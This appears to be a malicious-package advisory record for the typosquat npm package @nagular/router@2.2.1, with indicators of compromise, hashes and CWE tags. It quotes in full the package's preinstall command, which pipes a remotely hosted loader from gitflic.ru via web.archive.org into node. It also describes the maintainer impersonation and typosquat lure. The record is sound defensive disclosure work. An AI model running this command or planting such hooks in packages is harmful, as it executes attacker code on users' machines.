@nagular/router@2.2.1 impersonates router (it copies the code and metadata of the pillarjs router package) and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @nagular/router and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.
-= Per source details. Do not edit below this line.=-
package.json declares a preinstall lifecycle hook that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an opaque JavaScript payload from an unrelated third-party repository (gitflic.ru/hellscripter/install-scripts) proxied via web.archive.org and piping it directly into node at npm install time. The fetched bytes are not pinned by hash or version, the host is unrelated to the declared repository (pillarjs/router) or publisher domain (somethingdoug.com), and execution happens automatically with full user privileges on every install. Package metadata further impersonates the maintainer of the legitimate pillarjs/router package (author: Douglas Christopher Wilson) and uses the scope @nagular/router, a name likely to be confused with @angular/router, consistent with a typosquat lure designed to trick installers into running the preinstall dropper.
{
"iocs": {
"files": [
{
"digests": {
"sha256": "e2f4e8c00b7f3a8ff51e6f0f976f04aa5cdc35c3293878ce0435a6e324e92ab7"
},
"note": "preinstall script pipes the web.archive.org copy of gitflic.ru hellscripter/install-scripts node.js into node (@nagular/router@2.2.1).",
"paths": [
"package.json"
],
"source": "PACKAGE_ARCHIVE"
}
],
"urls": [
"https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js",
"https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js"
]
},
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020920",
"import_time": "2026-10-04T23:40:42.030484033Z",
"modified_time": "2026-10-04T23:19:54Z",
"sha256": "5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca",
"source": "amazon-inspector",
"versions": [
"2.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "e2f4e8c00b7f3a8ff51e6f0f976f04aa5cdc35c3293878ce0435a6e324e92ab7",
"tlsh": "7821db31cc499c3312c96af53c295043b561480b8d04fe1db7ee036c4f4e26f657aa29"
}
],
"package_integrity": [
{
"filename": "router-2.2.1.tgz",
"hashes": {
"sha1": "49b4e36c1348d50ead23f4530d9f2d877dfada89",
"sha512_sri": "sha512-PFUDWzCy4gYmyhNgqxVjROfON+cfU/3DdWZ+AwYGxpjLGPYiqwdHt8B8jq37liQ5WjS1507gPVhyhdQ/zy80RA=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@nagular/router/MAL-2026-17500.json"